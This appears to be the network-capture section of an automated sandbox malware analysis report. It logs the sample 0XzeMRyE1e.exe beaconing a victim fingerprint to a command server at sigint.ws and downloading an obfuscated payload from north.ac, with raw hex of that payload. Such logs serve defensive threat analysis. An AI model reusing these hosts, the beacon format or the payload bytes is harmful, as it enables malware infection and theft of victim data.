                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:49.543080091 CEST3475INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              85192.168.2.44985980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:49.805320024 CEST3476OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:49.988356113 CEST3476INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              86192.168.2.44986080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:50.236610889 CEST3477OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:50.418059111 CEST3477INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              87192.168.2.44986180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:50.675679922 CEST3478OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:50.857481003 CEST3478INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              88192.168.2.44986280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:51.108371973 CEST3479OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:51.285150051 CEST3479INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              89192.168.2.44986380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:51.496356964 CEST3479OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:51.677273989 CEST3480INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              9192.168.2.44978380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:53:58.462910891 CEST3405OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 31
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 64 31 3d 31 30 30 30 30 30 37 30 30 31 26 75 6e 69 74 3d 34 32 35 36 32 30 38 38 33 33 39 32
                                                                              Data Ascii: d1=1000007001&unit=425620883392
                                                                              Jun 2, 2022 01:53:58.646670103 CEST3406INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:53:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              90192.168.2.44986480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:51.906730890 CEST3480OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:52.089390993 CEST3481INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              91192.168.2.44986580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:52.313960075 CEST3481OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:52.496850967 CEST3482INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              92192.168.2.44986680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:52.699549913 CEST3482OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:52.885080099 CEST3483INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:52 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              93192.168.2.44986780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:53.090904951 CEST3483OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:53.272829056 CEST3483INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              94192.168.2.44986880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:53.522171021 CEST3484OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:53.703908920 CEST3484INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              95192.168.2.44986980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:54.121448994 CEST3485OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:54.304692030 CEST3485INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              96192.168.2.44987080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:54.611012936 CEST3486OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:54.795658112 CEST3486INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              97192.168.2.44987180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:55.173382044 CEST3487OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:55.354124069 CEST3487INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              98192.168.2.44987280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:55.595479965 CEST3488OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:55.778655052 CEST3488INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              99192.168.2.44987380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:56.035907030 CEST3489OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:56.215048075 CEST3489INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.449759172.67.152.230443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              2022-06-01 23:53:22 UTC0OUTGET /760 HTTP/1.1
                                                                              Host: north.ac
                                                                              Connection: Keep-Alive
                                                                              2022-06-01 23:53:22 UTC0INHTTP/1.1 200 OK
                                                                              Date: Wed, 01 Jun 2022 23:53:22 GMT
                                                                              Content-Length: 194560
                                                                              Connection: close
                                                                              Last-Modified: Thu, 26 May 2022 04:23:16 GMT
                                                                              Accept-Ranges: bytes
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AP7Zg752WNfeUzVi%2Bw%2Fa4FXF9QJtkG86GVh%2BgoVTaw%2BM2SfcxdTfadMSedXfmVHDgRLvDW7nXQ%2BPWEE9Sk%2FOFSWrM%2FEMSYR7mJQ34AH4bfAyj%2FOR87A14scFTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 714bde48eeea71ae-LHR
                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              2022-06-01 23:53:22 UTC0INData Raw: 45 52 88 f8 fb f8 f8 f8 fc f8 f8 f8 f7 f7 f8 f8 b0 f8 f8 f8 f8 f8 f8 f8 38 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 78 f8 f8 f8 06 17 b2 06 f8 ac 01 c5 19 b0 f9 44 c5 19 4c 60 61 6b 18 68 6a 67 5f 6a 59 65 18 5b 59 66 66 67 6c 18 5a 5d 18 6a 6d 66 18 61 66 18 3c 47 4b 18 65 67 5c 5d 26 05 05 02 1c f8 f8 f8 f8 f8 f8 f8 48 3d f8 f8 44 f9 fb f8 8b f9 85 5a f8 f8 f8 f8 f8 f8 f8 f8 d8 f8 fa 19 03 f9 00 f8 f8 e8 fa f8 f8 fe f8 f8 f8 f8 f8 f8 ae 07 fb f8 f8 18 f8 f8 f8 18 fb f8 f8 f8 38 f8 f8 18 f8 f8 f8 fa f8 f8 fc f8 f8 f8 f8 f8 f8 f8 fc f8 f8 f8 f8 f8 f8 f8 f8 58 fb f8 f8 fa f8 f8 f8 f8 f8 f8 fb f8 38 7d f8 f8 08 f8 f8 08 f8 f8 f8 f8 08 f8 f8 08 f8 f8 f8 f8 f8 f8 08 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
                                                                              Data Ascii: ER8xDL`akhjg_jYe[YffglZ]jmfaf<GKeg\]&H=DZ8X8}
                                                                              2022-06-01 23:53:22 UTC1INData Raw: d8 85 4b f8 f8 f9 1d c8 3c f8 f8 fc 0e 24 07 1e 1e 78 3d f8 f8 fc 22 20 f9 f8 f8 02 23 cb 20 f9 f8 f8 02 23 e4 16 6b fb f8 f8 fe 1e 22 0b 28 fc f8 00 f9 f8 f8 f9 f8 f8 09 fa 20 7e f8 f8 02 17 3e 05 0a fb 20 7f f8 f8 02 02 17 56 03 1b f6 f7 f7 57 8a 93 1b b6 04 30 ae f8 f8 f8 1b f8 f8 f8 f8 f8 f8 f8 38 1b c5 c4 c4 c4 c4 c4 f8 38 20 80 f8 f8 02 04 ff ff 18 ba b5 fd f8 53 18 ba b5 fd f8 52 ff 59 50 03 ff ff 18 46 85 fe f8 53 18 46 85 fe f8 52 ff 59 50 03 0e 0b fc fe 6d 07 f8 f8 f9 20 81 f8 f8 02 ff f6 fa 0b 00 09 00 24 fd 0f 0b fc 23 fb 0e 0b fc 09 fc 0b 01 09 01 24 fb 17 58 03 10 85 4c f8 f8 f9 1d 0e ff 96 1d 0f 18 01 fa f8 f8 96 0b fd 6b 82 f8 f8 02 0b fe 09 fd 6d f9 f8 f8 13 09 fe 6c 2e f8 f8 f9 0e 10 67 4f f8 f8 02 8c 0b ff 23 00 ff 18 74 d0 03 f8 50 03
                                                                              Data Ascii: K<$x=" # #k"( ~> VW088 SRYPFSFRYPm $#$XLkml.gO#tP
                                                                              2022-06-01 23:53:22 UTC2INData Raw: f7 f7 f7 02 30 1d f7 f7 f7 03 30 37 f7 f7 f7 20 d2 f8 f8 fe 30 4d f7 f7 f7 04 30 6d f7 f7 f7 f8 16 fa 20 7e f8 f8 02 22 3a 76 6c f8 f8 fc 20 de f8 f8 fe 78 f9 f8 f8 fc 22 f8 f8 f8 12 6b 87 f8 f8 02 72 f8 16 fa 20 7e f8 f8 02 22 16 fa 20 7e f8 f8 02 22 8a 76 74 f8 f8 fc 76 72 f8 f8 fc 76 70 f8 f8 fc 20 e1 f8 f8 fe 20 e4 f8 f8 fe 20 e7 f8 f8 fe 78 fa f8 f8 fc 22 f8 f8 f8 03 28 fc f8 23 f8 f8 f8 f8 f8 f8 f8 76 79 f8 f8 fc 6a 82 40 f8 68 fb 20 ea f8 f8 fe 78 fb f8 f8 fc fa fb fc 16 25 fd 1e 1e 1e d6 02 20 0f f8 f8 fe 23 ef 1e d6 f8 22 f8 f9 08 f8 f8 f8 f8 f8 f8 1f 1f f8 fb f9 f8 f8 f9 0b 28 00 f8 80 f8 f8 f8 ff f8 f8 09 12 85 07 f8 f8 f9 1d 0e 6a 86 40 f8 68 6a ea 40 f8 68 0f 1b 51 61 4a 02 ec 3b cf 38 0f 20 0e f8 f8 fe 9a 1d 0f 6a f2 40 f8 68 6a 62 41 f8 68
